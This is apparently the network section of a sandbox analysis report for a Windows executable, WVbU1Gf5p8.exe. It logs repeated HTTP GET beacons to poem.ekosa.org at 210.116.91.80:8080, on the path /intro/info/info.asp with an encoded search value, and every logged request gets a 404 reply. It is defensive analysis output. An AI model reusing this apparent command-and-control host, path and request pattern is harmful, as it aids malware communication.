      15192.168.2.449778210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:05.361941099 CET283OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:05.632652044 CET288INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:04 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      150192.168.2.449929210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      151192.168.2.449930210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      152192.168.2.449931210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      153192.168.2.449932210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      154192.168.2.449934210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      155192.168.2.449935210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      156192.168.2.449936210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      157192.168.2.449937210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      158192.168.2.449938210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      159192.168.2.449939210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      16192.168.2.449780210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:05.903429985 CET291OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:06.166101933 CET296INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      160192.168.2.449940210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      161192.168.2.449941210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      162192.168.2.449942210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      163192.168.2.449943210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      164192.168.2.449944210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      165192.168.2.449945210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      166192.168.2.449946210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      167192.168.2.449947210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      168192.168.2.449948210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      169192.168.2.449949210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      17192.168.2.449781210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:06.434833050 CET298OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:06.696373940 CET298INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      170192.168.2.449950210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      171192.168.2.449951210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      172192.168.2.449952210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      173192.168.2.449953210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      174192.168.2.449954210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      175192.168.2.449955210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      176192.168.2.449956210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      177192.168.2.449957210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      178192.168.2.449958210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      179192.168.2.449959210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      18192.168.2.449782210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:07.077856064 CET387OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:07.339922905 CET387INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      180192.168.2.449960210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      181192.168.2.449961210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      182192.168.2.449962210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      183192.168.2.449963210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      184192.168.2.449964210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      185192.168.2.449965210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      186192.168.2.449966210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      187192.168.2.449967210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      188192.168.2.449968210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      189192.168.2.449969210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      19192.168.2.449783210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:07.608453035 CET388OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:07.871875048 CET388INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      190192.168.2.449970210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      191192.168.2.449971210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      192192.168.2.449972210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      193192.168.2.449973210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      194192.168.2.449974210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      195192.168.2.449975210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      196192.168.2.449976210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      197192.168.2.449977210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      198192.168.2.449978210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      199192.168.2.449979210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.449759210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:57.754849911 CET93OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:58.014203072 CET94INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      20192.168.2.449784210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:08.144635916 CET389OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:08.404642105 CET390INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      200192.168.2.449980210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      201192.168.2.449981210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      202192.168.2.449982210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      203192.168.2.449983210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      204192.168.2.449984210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      205192.168.2.449985210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      206192.168.2.449986210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      207192.168.2.449987210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
